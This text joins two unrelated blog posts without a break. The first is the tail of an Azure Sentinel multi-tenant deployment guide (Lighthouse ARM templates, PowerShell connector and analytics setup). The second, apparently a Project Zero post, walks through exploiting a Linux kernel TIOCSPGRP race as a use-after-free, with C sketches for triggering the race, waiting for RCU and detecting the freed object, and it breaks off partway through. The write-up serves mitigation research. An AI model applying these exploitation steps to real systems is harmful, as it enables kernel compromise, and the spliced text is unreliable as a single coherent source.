This script takes in the config file we generated earlier to read out the client / sub tenant values for location and resource group, then sets up Lighthouse with the ARM template / parameter file below, after replacing the ‘{principalId}’ placeholder in the parameter file with the Azure AD group ID we set up earlier.

Note that in the Lighthouse ARM template and parameter file, we are keeping the permissions to an absolute minimum, so users in the Azure AD group in the master tenant will only be able to interact with the permissions granted using the role definition IDs specified.

If you are setting up Lighthouse for the management of additional parts of the sub tenant, you can add and change the role definition IDs to suit your needs.

Lighthouse.parameters.json

{
  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "mspOfferName": {
      "value": "Enter Offering Name"
    },
    "mspOfferDescription": {
      "value": "Enter Description"
    },
    "managedByTenantId": {
      "value": "ID OF YOUR MASTER TENANT"
    },
    "authorizations": {
      "value": [
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "ab8e14d6-4a74-4a29-9ba8-549422addade",
          "principalIdDisplayName": " Sentinel Contributor"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "3e150937-b8fe-4cfb-8069-0eaf05ecd056",
          "principalIdDisplayName": " Sentinel Responder"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "8d289c81-5878-46d4-8554-54e1e3d8b5cb",
          "principalIdDisplayName": "Sentinel Reader"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "f4c81013-99ee-4d62-a7ee-b3f1f648599a",
          "principalIdDisplayName": "Sentinel Automation Contributor"
        }
      ]
    },
    "rgName": {
      "value": "RG-Sentinel"
    }
  }
}


Lighthouse.json

{
    "$schema": "https://schema.management.azure.com/schemas/2018-05-01/subscriptionDeploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "parameters": {
        "mspOfferName": { "type": "string" },
        "mspOfferDescription": { "type": "string" },
        "managedByTenantId": { "type": "string" },
        "authorizations": { "type": "array" },
        "rgName": { "type": "string" }
    },
    "variables": {
        "mspRegistrationName": "[guid(parameters('mspOfferName'))]",
        "mspAssignmentName": "[guid(parameters('rgName'))]"
    },
    "resources": [
        {
            "type": "Microsoft.ManagedServices/registrationDefinitions",
            "apiVersion": "2019-06-01",
            "name": "[variables('mspRegistrationName')]",
            "properties": {
                "registrationDefinitionName": "[parameters('mspOfferName')]",
                "description": "[parameters('mspOfferDescription')]",
                "managedByTenantId": "[parameters('managedByTenantId')]",
                "authorizations": "[parameters('authorizations')]"
            }
        },
        {
            "type": "Microsoft.Resources/deployments",
            "apiVersion": "2018-05-01",
            "name": "rgAssignment",
            "resourceGroup": "[parameters('rgName')]",
            "dependsOn": [
                "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"
            ],
            "properties": {
                "mode": "Incremental",
                "template": {
                    "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                    "contentVersion": "1.0.0.0",
                    "parameters": {},
                    "resources": [
                        {
                            "type": "Microsoft.ManagedServices/registrationAssignments",
                            "apiVersion": "2019-06-01",
                            "name": "[variables('mspAssignmentName')]",
                            "properties": {
                                "registrationDefinitionId": "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"
                            }
                        }
                    ]
                }
            }
        }
    ],
    "outputs": {
        "mspOfferName": {
            "type": "string",
            "value": "[concat('Managed by', ' ', parameters('mspOfferName'))]"
        },
        "authorizations": {
            "type": "array",
            "value": "[parameters('authorizations')]"
        }
    }
}

Enable Connectors

At the time of creating this solution, there were still a few connectors that could not be set via ARM, and I imagine this will still be the case for new connectors as they get added to Sentinel. I will therefore cover both deployment types, as well as how to find out what body to include in the posts to the API.

For most connectors you can use existing solutions such as:

Roberto Rodriguez’s Azure-Sentinel2Go

Or

GitHub – javiersoriano/sentinel-all-in-one

First, we install the required modules and get the list of connectors to enable for our client / sub tenant, then compare them to the list of connectors that are already enabled:

param(
    [string]$templateLocation = '',
    [string]$customerConfig
)
$config = Get-Content -Path $customerConfig | ConvertFrom-Json
$connectors = $config.connectors
$resourceGroupName = $config.TargetResourceGroup
$WorkspaceName = $config.TargetWorkspaceName
$templateLocation

Install-Module AzSentinel -Scope CurrentUser -Force

$connectorList = $connectors -split ','
$rg = Get-AzResourceGroup -Name $resourceGroupName
# Only deploy connectors that aren't already enabled
$check = Get-AzSentinelDataConnector -WorkspaceName $WorkspaceName | Select-Object -ExpandProperty kind
$outputArray = $connectorList | Where-Object {$_ -notin $check}
$tenantId = (Get-AzContext).Tenant.Id
$subscriptionId = (Get-AzSubscription).Id

$Resource = "https://management.azure.com/"

Next, we attempt to deploy the connectors using the ARM templates from one of the above solutions.

foreach($con in $outputArray)
{
    Write-Host "deploying $($con)"
    $out = $null
    $out = New-AzResourceGroupDeployment -ResourceGroupName "$($resourceGroupName)" -TemplateFile $templateLocation -dataConnectorsKind "$($con)" -workspaceName "$($WorkspaceName)" -securityCollectionTier "ALL" -tenantId "$($tenantId)" -subscriptionId "$($subscriptionId)" -mcasDiscoveryLogs $true -Location $rg.Location -ErrorAction SilentlyContinue
    if($out.ProvisioningState -eq "Failed")
    {
        Write-Host '------------------------'
        Write-Host "Unable to deploy $($con)"
        $out | Format-Table
        Write-Host '------------------------'
        Write-Host "##vso[task.LogIssue type=warning;]Unable to deploy $($con) CorrelationId: $($out.CorrelationId)"
    }
    else
    {
        Write-Host "deployed $($con)"
    }
}

If the connector fails to deploy, we write a warning message to the pipeline.

This will work for most connectors and might be all you need for your requirements.

If a connector is not available this way, as the Active Directory Diagnostics connector was not when I created this, we need to use a different approach. Thanks to Roberto Rodriguez for the suggestion.

  1. Using your favourite Browser, go to an existing Sentinel instance that allows you to enable the connector you need.
  2. Go through the steps of enabling the connector; on the last step, when submitting, open the debug console (dev tools) in your browser and look through the POST requests made on the Network tab.
  3. There should be one containing the payload for the connector you just enabled with the correct settings and URL to post to.
  4. Now we can replicate this payload in PowerShell and enable them automatically.

When enabling the connector, note the required permissions needed and ensure your ADO service connection meets the requirements!

Create the URI using the URL from the POST message, replacing required values such as the workspace name with the one used for your target environment.

Example:

$uri = "/providers/microsoft.aadiam/diagnosticSettings/AzureSentinel_$($WorkspaceName)?api-version=2017-04-01"

Build up the JSON post message starting with static bits

        $payload = '{
            "kind": "AzureActiveDirectoryDiagnostics",
            "properties": {
                "logs": [
                    {
                        "category": "SignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "AuditLogs",
                        "enabled": true
                    },
                    {
                        "category": "NonInteractiveUserSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ServicePrincipalSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ManagedIdentitySignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ProvisioningLogs",
                        "enabled": true
                    }
                ]
            }
        }'|ConvertFrom-Json

Add additional required properties that were not included in the static part:

        $connectorProperties = $payload.properties
        $connectorProperties | Add-Member -NotePropertyName workspaceId -NotePropertyValue "/subscriptions/$($subscriptionId)/resourceGroups/$($resourceGroupName)/providers/Microsoft.OperationalInsights/workspaces/$($WorkspaceName)"

        # Build the request body as a hashtable so ConvertTo-Json serialises both keys
        $connectorBody = @{}
        $connectorBody.Add("name","AzureSentinel_$($WorkspaceName)")
        $connectorBody.Add("properties",$connectorProperties)

And finally, try firing the request at Azure with a bit of error handling to write a warning to the pipeline if something goes wrong.

        try {
            $result = Invoke-AzRestMethod -Path $uri -Method PUT -Payload ($connectorBody | ConvertTo-Json -Depth 3)
            if ($result.StatusCode -eq 200) {
                Write-Host "Successfully enabled data connector: $($payload.kind)"
            }
            else {
                Write-Host "##vso[task.LogIssue type=warning;]Unable to deploy $($payload.kind) with error: $($result.Content)"
            }
        }
        catch {
            $errorReturn = $_
            Write-Verbose $_
            Write-Host "##vso[task.LogIssue type=warning;]Unable to deploy $($payload.kind) with error: $errorReturn"
        }

Phase 2: Deploy Sentinel analytics to Master tenant pointed at Sub tenant logs

If you followed all the above steps, onboarded a sub tenant, and are in the Azure AD group, you should now be able to see the sub tenant's Log Analytics workspace in your Master Tenant Sentinel. At this stage you can also remove the service principal in the sub tenant.

If you cannot see it:

  • It sometimes takes 30+ minutes for Lighthouse connected tenants to show up in the master tenant.
  • Ensure you have the sub tenant selected in “Directories + Subscriptions”.
  • In Sentinel, make sure the subscription is selected in your filter.

Deploying a new analytic

First load a template analytic.

If you just exported the analytics from an existing Sentinel instance, you only need to make sure you set the workspace inside the query to the correct one:

$alert = (Get-Content -Path $file.FullName) | ConvertFrom-Json
$analyticsTemplate = $alert.detection_query -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName)

In my case, I am loading a custom analytics file, so I need to combine it with my template file and set a few more bits.

$alert = (Get-Content -Path $file.FullName) | ConvertFrom-Json
$workspaceName = '$(naming.LogAnalyticsWorkspace)'
$resourceGroupName = '$(naming.CustomerResourceGroup)'
$id = New-Guid
$analyticsTemplate = (Get-Content -Path $detectionPath) -replace '{DisplayPrefix}' , 'Sentinel-' -replace '{DisplayName}' , $alert.display_name -replace '{DetectionName}' , $alert.detection_name -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName) | ConvertFrom-Json

$QueryPeriod = ([timespan]$alert.Interval)
$lookbackPeriod = ([timespan]$alert.LookupPeriod)
$SuppressionDuration = ([timespan]$alert.LookupPeriod)

$alert.detection_query = $alert.detection_query -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName)
$alert.detection_query
$tempDescription = $alert.description
$analyticsTemplate.Severity = $alert.severity

Create the analytic in Sentinel

When creating the analytics, you can either

  1. put them directly into the analytics workspace that is now visible in the Master tenant through Lighthouse, or
  2. create a new workspace and point the analytics at the other workspace by adding workspace(targetworkspace) to all tables in your analytics, for example workspace(targetworkspace).DeviceEvents.

The latter keeps all the analytics in the Master tenant, so all queries can be stored there and never go into the sub tenant (useful for protecting intellectual property, or simply for having all analytics in one workspace pointing at all the others).
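For illustration, an analytic following the second option would wrap every table reference in workspace(); a hedged example (table, threshold and workspace name are arbitrary):

workspace('targetworkspace').SecurityEvent
| where EventID == 4625
| summarize FailedLogons = count() by Account, bin(TimeGenerated, 15m)
| where FailedLogons > 20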

At the time of creating the automated solution for this, I had a few issues with the various ways of deploying analytics, which have hopefully been solved by now. Below is my workaround that is still fully functional.

  • The Az.SecurityInsights version of New-AzSentinelAlertRule did not allow me to set tactics on the analytic.
  • The azsentinel version did have a working way to add tactics, but failed to create the analytic properly.
  • Neither of them worked for adding entities.

So in a rather unpleasant solution I:

  1. Create the initial analytic using Az.SecurityInsights\New-AzSentinelAlertRule
  2. Add the tactic using azsentinel\New-AzSentinelAlertRule
  3. Add the entities and final settings using the API

Az.SecurityInsights\New-AzSentinelAlertRule -WorkspaceName $workspaceName -QueryPeriod $lookbackPeriod -Query $analyticsTemplate.detection_query -QueryFrequency $QueryPeriod -ResourceGroupName $resourceGroupName -AlertRuleId $id -Scheduled -Enabled -DisplayName $analyticsTemplate.DisplayName -Description $tempDescription -SuppressionDuration $SuppressionDuration -Severity $analyticsTemplate.Severity -TriggerOperator $analyticsTemplate.TriggerOperator -TriggerThreshold $analyticsTemplate.TriggerThreshold
$newAlert = azsentinel\Get-AzSentinelAlertRule -WorkspaceName $workspaceName | Where-Object {$_.name -eq $id}
$newAlert.Query = $alert.detection_query
$newAlert.enabled = $analyticsTemplate.Enabled
azsentinel\New-AzSentinelAlertRule -WorkspaceName $workspaceName -Kind $newAlert.kind -SuppressionEnabled $newAlert.suppressionEnabled -Query $newAlert.query -DisplayName $newAlert.displayName -Description $newAlert.description -Tactics $newAlert.tactics -QueryFrequency $newAlert.queryFrequency -Severity $newAlert.severity -Enabled $newAlert.enabled -QueryPeriod $newAlert.queryPeriod -TriggerOperator $newAlert.triggerOperator -TriggerThreshold $newAlert.triggerThreshold -SuppressionDuration $newAlert.suppressionDuration
      
$additionUri = $newAlert.id + '?api-version=2021-03-01-preview'
$additionUri
$result = Invoke-AzRestMethod -Path $additionUri -Method Get
$entityCont = '[]' | ConvertFrom-Json
$entities = $alert.analyticsEntities.entityMappings | ConvertTo-Json -Depth 4
$content = $result.Content | ConvertFrom-Json
$tactics = $alert.tactic.Split(',') | ConvertTo-Json
$aggregation = 'SingleAlert'
if($alert.Grouping)
{
    if($alert.Grouping -eq 'AlertPerResult')
    {
        $aggregation = 'AlertPerResult'
    }
}

$body = '{"id":"'+$content.id+'","name":"'+$content.name+'","type":"Microsoft.SecurityInsights/alertRules","kind":"Scheduled","properties":{"displayName":"'+$content.properties.displayName+'","description":"'+$content.properties.description+'","severity":"'+$content.properties.severity+'","enabled":true,"query":'+($content.properties.query |ConvertTo-Json)+',"queryFrequency":"'+$content.properties.queryFrequency+'","queryPeriod":"'+$content.properties.queryPeriod+'","triggerOperator":"'+$content.properties.triggerOperator+'","triggerThreshold":'+$content.properties.triggerThreshold+',"suppressionDuration":"'+$content.properties.suppressionDuration+'","suppressionEnabled":false,"tactics":'+$tactics+',"alertRuleTemplateName":null,"incidentConfiguration":{"createIncident":true,"groupingConfiguration":{"enabled":false,"reopenClosedIncident":false,"lookbackDuration":"PT5H","matchingMethod":"AllEntities","groupByEntities":[],"groupByAlertDetails":[],"groupByCustomDetails":[]}},"eventGroupingSettings":{"aggregationKind":"'+$aggregation+'"},"alertDetailsOverride":null,"customDetails":null,"entityMappings":'+ $entities +'}}'

$res = Invoke-AzRestMethod -Path $additionUri -Method Put -Payload $body

You should now have all the components needed to create your own multi-Tenant enterprise scale pipelines.

The value from this solution comes from:

  1. Being able to quickly push custom-made analytics to a multitude of workspaces.
  2. Being able to source control analytics and code review them before deploying.
  3. Having the ability to manage all sub tenants from the same master tenant without having to create accounts in each tenant.
  4. Consistent RBAC for all tenants.
  5. A huge amount of room to extend this solution.


As mentioned at the start, this blog post only covers a small part of the overall deployment strategy we have at NCC Group, to illustrate the overall deployment workflow we’ve taken for Azure Sentinel. Upon this foundation, we’ve built a substantial ecosystem of custom analytics to support advanced detection and response.

How a simple Linux kernel memory corruption bug can lead to complete system compromise

19 October 2021 at 16:08
By: Ryan

An analysis of current and potential kernel security mitigations

Posted by Jann Horn, Project Zero

Introduction

This blog post describes a straightforward Linux kernel locking bug and how I exploited it against Debian Buster's 4.19.0-13-amd64 kernel. Based on that, it explores options for security mitigations that could prevent or hinder exploitation of issues similar to this one.

I hope that stepping through such an exploit and sharing this compiled knowledge with the wider security community can help with reasoning about the relative utility of various mitigation approaches.

A lot of the individual exploitation techniques and mitigation options that I am describing here aren't novel. However, I believe that there is value in writing them up together to show how various mitigations interact with a fairly normal use-after-free exploit.

Our bugtracker entry for this bug, along with the proof of concept, is at https://bugs.chromium.org/p/project-zero/issues/detail?id=2125.

Code snippets in this blog post that are relevant to the exploit are taken from the upstream 4.19.160 release, since that is what the targeted Debian kernel is based on; some other code snippets are from mainline Linux.

(In case you're wondering why the bug and the targeted Debian kernel are from end of last year: I already wrote most of this blogpost around April, but only recently finished it)

I would like to thank Ryan Hileman for a discussion we had a while back about how static analysis might fit into static prevention of security bugs (but note that Ryan hasn't reviewed this post and doesn't necessarily agree with any of my opinions). I also want to thank Kees Cook for providing feedback on an earlier version of this post (again, without implying that he necessarily agrees with everything), and my Project Zero colleagues for reviewing this post and frequent discussions about exploit mitigations.

Background for the bug

On Linux, terminal devices (such as a serial console or a virtual console) are represented by a struct tty_struct. Among other things, this structure contains fields used for the job control features of terminals, which are usually modified using a set of ioctls:

struct tty_struct {
[...]
spinlock_t ctrl_lock;
[...]
struct pid *pgrp; /* Protected by ctrl lock */
struct pid *session;
[...]
struct tty_struct *link;
[...]
}[...];

The pgrp field points to the foreground process group of the terminal (normally modified from userspace via the TIOCSPGRP ioctl); the session field points to the session associated with the terminal. Both of these fields do not point directly to a process/task, but rather to a struct pid. struct pid ties a specific incarnation of a numeric ID to a set of processes that use that ID as their PID (also known in userspace as TID), TGID (also known in userspace as PID), PGID, or SID. You can kind of think of it as a weak reference to a process, although that's not entirely accurate. (There's some extra nuance around struct pid when execve() is called by a non-leader thread, but that's irrelevant here.)

All processes that are running inside a terminal and are subject to its job control refer to that terminal as their "controlling terminal" (stored in ->signal->tty of the process).

A special type of terminal device are pseudoterminals, which are used when you, for example, open a terminal application in a graphical environment or connect to a remote machine via SSH. While other terminal devices are connected to some sort of hardware, both ends of a pseudoterminal are controlled by userspace, and pseudoterminals can be freely created by (unprivileged) userspace. Every time /dev/ptmx (short for "pseudoterminal multiplexor") is opened, the resulting file descriptor represents the device side (referred to in documentation and kernel sources as "the pseudoterminal master") of a new pseudoterminal. You can read from it to get the data that should be printed on the emulated screen, and write to it to emulate keyboard inputs. The corresponding terminal device (to which you'd usually connect a shell) is automatically created by the kernel under /dev/pts/<number>.
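For reference, obtaining file descriptors for both ends takes only a few calls from unprivileged userspace (a minimal sketch, not code from the exploit):

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>

int main(void) {
    /* device side ("pseudoterminal master") */
    int ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);
    grantpt(ptmx);    /* set up ownership/permissions of the terminal side */
    unlockpt(ptmx);   /* allow the terminal side to be opened */
    /* terminal side, /dev/pts/<number> */
    int pts = open(ptsname(ptmx), O_RDWR | O_NOCTTY);
    return (ptmx < 0 || pts < 0);
}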

One thing that makes pseudoterminals particularly strange is that both ends of the pseudoterminal have their own struct tty_struct, which point to each other using the link member, even though the device side of the pseudoterminal does not have terminal features like job control - so many of its members are unused.

Many of the ioctls for terminal management can be used on both ends of the pseudoterminal; but no matter on which end you call them, they affect the same state, sometimes with minor differences in behavior. For example, in the ioctl handler for TIOCGPGRP:

/**
* tiocgpgrp - get process group
* @tty: tty passed by user
* @real_tty: tty side of the tty passed by the user if a pty else the tty
* @p: returned pid
*
* Obtain the process group of the tty. If there is no process group
* return an error.
*
* Locking: none. Reference to current->signal->tty is safe.
*/
static int tiocgpgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
struct pid *pid;
int ret;
/*
* (tty == real_tty) is a cheap way of
* testing if the tty is NOT a master pty.
*/
if (tty == real_tty && current->signal->tty != real_tty)
return -ENOTTY;
pid = tty_get_pgrp(real_tty);
ret = put_user(pid_vnr(pid), p);
put_pid(pid);
return ret;
}

As documented in the comment above, these handlers receive a pointer real_tty that points to the normal terminal device; an additional pointer tty is passed in that can be used to figure out on which end of the terminal the ioctl was originally called. As this example illustrates, the tty pointer is normally only used for things like pointer comparisons. In this case, it is used to prevent TIOCGPGRP from working when called on the terminal side by a process which does not have this terminal as its controlling terminal.

Note: If you want to know more about how terminals and job control are intended to work, the book "The Linux Programming Interface" provides a nice introduction to how these older parts of the userspace API are supposed to work. It doesn't describe any of the kernel internals though, since it's written as a reference for userspace programming. And it's from 2010, so it doesn't have anything in it about new APIs that have showed up over the last decade.

The bug

The bug was in the ioctl handler tiocspgrp:

/**
* tiocspgrp - attempt to set process group
* @tty: tty passed by user
* @real_tty: tty side device matching tty passed by user
* @p: pid pointer
*
* Set the process group of the tty to the session passed. Only
* permitted where the tty session is our session.
*
* Locking: RCU, ctrl lock
*/
static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
struct pid *pgrp;
pid_t pgrp_nr;
[...]
if (get_user(pgrp_nr, p))
return -EFAULT;
[...]
pgrp = find_vpid(pgrp_nr);
[...]
spin_lock_irq(&tty->ctrl_lock);
put_pid(real_tty->pgrp);
real_tty->pgrp = get_pid(pgrp);
spin_unlock_irq(&tty->ctrl_lock);
[...]
}

The pgrp member of the terminal side (real_tty) is being modified, and the reference counts of the old and new process group are adjusted accordingly using put_pid and get_pid; but the lock is taken on tty, which can be either end of the pseudoterminal pair, depending on which file descriptor we pass to ioctl(). So by simultaneously calling the TIOCSPGRP ioctl on both sides of the pseudoterminal, we can cause data races between concurrent accesses to the pgrp member. This can cause reference counts to become skewed through the following races:

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
  spin_lock_irq(...)                  spin_lock_irq(...)
  put_pid(old_pid)
                                      put_pid(old_pid)
  real_tty->pgrp = get_pid(A)
                                      real_tty->pgrp = get_pid(B)
  spin_unlock_irq(...)                spin_unlock_irq(...)

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
  spin_lock_irq(...)                  spin_lock_irq(...)
  put_pid(old_pid)
                                      put_pid(old_pid)
                                      real_tty->pgrp = get_pid(B)
  real_tty->pgrp = get_pid(A)
  spin_unlock_irq(...)                spin_unlock_irq(...)

In both cases, the refcount of the old struct pid is decremented by 1 too much, and either A's or B's is incremented by 1 too much.

Once you understand the issue, the fix seems relatively obvious:

    if (session_of_pgrp(pgrp) != task_session(current))
goto out_unlock;
retval = 0;
- spin_lock_irq(&tty->ctrl_lock);
+ spin_lock_irq(&real_tty->ctrl_lock);
put_pid(real_tty->pgrp);
real_tty->pgrp = get_pid(pgrp);
- spin_unlock_irq(&tty->ctrl_lock);
+ spin_unlock_irq(&real_tty->ctrl_lock);
out_unlock:
rcu_read_unlock();
return retval;

Attack stages

In this section, I will first walk through how my exploit works; afterwards I will discuss different defensive techniques that target these attack stages.

Attack stage: Freeing the object with multiple dangling references

This bug allows us to probabilistically skew the refcount of a struct pid down, depending on which way the race happens: We can run colliding TIOCSPGRP calls from two threads repeatedly, and from time to time that will mess up the refcount. But we don't immediately know how many times the refcount skew has actually happened.
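Conceptually, the colliding calls look like this (a simplified sketch; the actual proof of concept synchronizes the threads to widen the race window):

#include <pthread.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <termios.h>

static int fds[2];      /* fds[0]: device side, fds[1]: terminal side of one pty pair */
static pid_t pgrps[2];  /* two valid process group IDs in our session */

static void *racer(void *arg) {
    long idx = (long)arg;
    for (int i = 0; i < 100000; i++)
        ioctl(fds[idx], TIOCSPGRP, &pgrps[idx]); /* both calls modify real_tty->pgrp */
    return NULL;
}
/* started as: pthread_create(&t0, NULL, racer, (void *)0);
 *             pthread_create(&t1, NULL, racer, (void *)1); */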

What we'd really want as an attacker is a way to skew the refcount deterministically. We'll have to somehow compensate for our lack of information about whether the refcount was skewed successfully. We could try to somehow make the race deterministic (seems difficult), or after each attempt to skew the refcount assume that the race worked and run the rest of the exploit (since if we didn't skew the refcount, the initial memory corruption is gone, and nothing bad will happen), or we can attempt to find an information leak that lets us figure out the state of the reference count.

On typical desktop/server distributions, the following approach works (unreliably, depending on RAM size) for setting up a freed struct pid with multiple dangling references:

  1. Allocate a new struct pid (by creating a new task).
  2. Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up).
  3. Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.
  4. Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified. A sketch of the membarrier() approach follows this list.)
  5. Create a new thread, and let that thread attempt to drop all the references we created.
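For step 4, the membarrier() variant can be as small as this (a minimal sketch; it relies on the unified-RCU behavior described above):

#define _GNU_SOURCE
#include <linux/membarrier.h>
#include <sys/syscall.h>
#include <unistd.h>

static void wait_for_rcu_grace_period(void) {
    /* MEMBARRIER_CMD_GLOBAL performs a synchronize_rcu() internally, so once
     * it returns, a full RCU grace period has elapsed. */
    syscall(SYS_membarrier, MEMBARRIER_CMD_GLOBAL, 0);
}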

Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid will be freed at some point during step 5; the next attempt to drop a reference will cause a use-after-free:

struct upid {
int nr;
struct pid_namespace *ns;
};

struct pid
{
atomic_t count;
unsigned int level;
/* lists of tasks that use this pid */
struct hlist_head tasks[PIDTYPE_MAX];
struct rcu_head rcu;
struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
struct pid_namespace *ns;

if (!pid)
return;

ns = pid->numbers[pid->level].ns;
if ((atomic_read(&pid->count) == 1) ||
atomic_dec_and_test(&pid->count)) {
kmem_cache_free(ns->pid_cachep, pid);
put_pid_ns(ns);
}
}

When the object is freed, the SLUB allocator normally replaces the first 8 bytes (sidenote: a different position is chosen starting in 5.7, see Kees' blog) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)

Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.
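In code, using the crash as a signal can be as simple as checking the child's exit status (a conceptual sketch; drop_remaining_refs() is a hypothetical stand-in for the PoC's reference-dropping loop):

#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

extern void drop_remaining_refs(void); /* hypothetical: put_pid() loop that eventually faults */

static int pid_is_freed(void) {
    pid_t child = fork();
    if (child == 0) {
        drop_remaining_refs();
        _exit(0);               /* not reached if the kernel oops kills the child */
    }
    int status;
    waitpid(child, &status, 0);
    return WIFSIGNALED(status); /* killed => UAF page fault => object was freed */
}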

If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED case).

Discarded attack idea: Directly exploiting the UAF at the SLUB level

On the Debian kernel I was looking at, a struct pid in the initial namespace is allocated from the same kmem_cache as struct seq_file and struct epitem - these three slabs have been merged into one by find_mergeable() to reduce memory fragmentation, since their object sizes, alignment requirements, and flags match:

root@debian:/sys/kernel/slab# ls -l pid
lrwxrwxrwx 1 root root 0 Feb 6 00:09 pid -> :A-0000128
root@debian:/sys/kernel/slab# ls -l | grep :A-0000128
drwxr-xr-x 2 root root 0 Feb 6 00:09 :A-0000128
lrwxrwxrwx 1 root root 0 Feb 6 00:09 eventpoll_epi -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb 6 00:09 pid -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb 6 00:09 seq_file -> :A-0000128
root@debian:/sys/kernel/slab#

A straightforward way to exploit a dangling reference to a SLUB object is to reallocate the object through the same kmem_cache it came from, without ever letting the page reach the page allocator. To figure out whether it's easy to exploit this bug this way, I made a table listing which fields appear at each offset in these three data structures (using pahole -E --hex -C <typename> <path to vmlinux debug info>):

offset | pid                         | eventpoll_epi / epitem (RCU-freed)  | seq_file
-------|-----------------------------|-------------------------------------|--------------------------
0x00   | count.counter (4) (CONTROL) | rbn.__rb_parent_color (8) (TARGET?) | buf (8) (TARGET?)
0x04   | level (4)                   |                                     |
0x08   | tasks[PIDTYPE_PID] (8)      | rbn.rb_right (8) / rcu.func (8)     | size (8)
0x10   | tasks[PIDTYPE_TGID] (8)     | rbn.rb_left (8)                     | from (8)
0x18   | tasks[PIDTYPE_PGID] (8)     | rdllink.next (8)                    | count (8)
0x20   | tasks[PIDTYPE_SID] (8)      | rdllink.prev (8)                    | pad_until (8)
0x28   | rcu.next (8)                | next (8)                            | index (8)
0x30   | rcu.func (8)                | ffd.file (8)                        | read_pos (8)
0x38   | numbers[0].nr (4)           | ffd.fd (4)                          | version (8)
0x3c   | [hole] (4)                  | nwait (4)                           |
0x40   | numbers[0].ns (8)           | pwqlist.next (8)                    | lock (0x20): counter (8)
0x48   | ---                         | pwqlist.prev (8)                    |
0x50   | ---                         | ep (8)                              |
0x58   | ---                         | fllink.next (8)                     |
0x60   | ---                         | fllink.prev (8)                     | op (8)
0x68   | ---                         | ws (8)                              | poll_event (4)
0x6c   | ---                         | [hole] (4)                          |
0x70   | ---                         | event.events (4)                    | file (8)
0x74   | ---                         | event.data (8) (CONTROL)            |
0x78   | ---                         |                                     | private (8) (TARGET?)
0x7c   | ---                         | ---                                 |
0x80   | ---                         | ---                                 | ---

In this case, reallocating the object as one of those three types didn't seem to me like a nice way forward (although it should be possible to exploit this somehow with some effort, e.g. by using count.counter to corrupt the buf field of seq_file). Also, some systems might be using the slab_nomerge kernel command line flag, which disables this merging behavior.

Another approach that I didn't look into here would have been to try to corrupt the obfuscated SLUB freelist pointer (obfuscation is implemented in freelist_ptr()); but since that stores the pointer in big-endian, count.counter would only effectively let us corrupt the more significant half of the pointer, which would probably be a pain to exploit.

Attack stage: Freeing the object's page to the page allocator

This section will refer to some internals of the SLUB allocator; if you aren't familiar with those, you may want to at least look at slides 2-4 and 13-14 of Christoph Lameter's slab allocator overview talk from 2014. (Note that that talk covers three different allocators; the SLUB allocator is what most systems use nowadays.)

The alternative to exploiting the UAF at the SLUB allocator level is to flush the page out to the page allocator (also called the buddy allocator), which is the last level of dynamic memory allocation on Linux (once the system is far enough into the boot process that the memblock allocator is no longer used). From there, the page can theoretically end up in pretty much any context. We can flush the page out to the page allocator with the following steps:

  1. Instruct the kernel to pin our task to a single CPU. Both SLUB and the page allocator use per-cpu structures; so if the kernel migrates us to a different CPU in the middle, we would fail.
  2. Before allocating the victim struct pid whose refcount will be corrupted, allocate a large number of objects to drain partially-free slab pages of all their unallocated objects. If the victim object (which will be allocated in step 5 below) landed in a page that is already partially used at this point, we wouldn't be able to free that page.
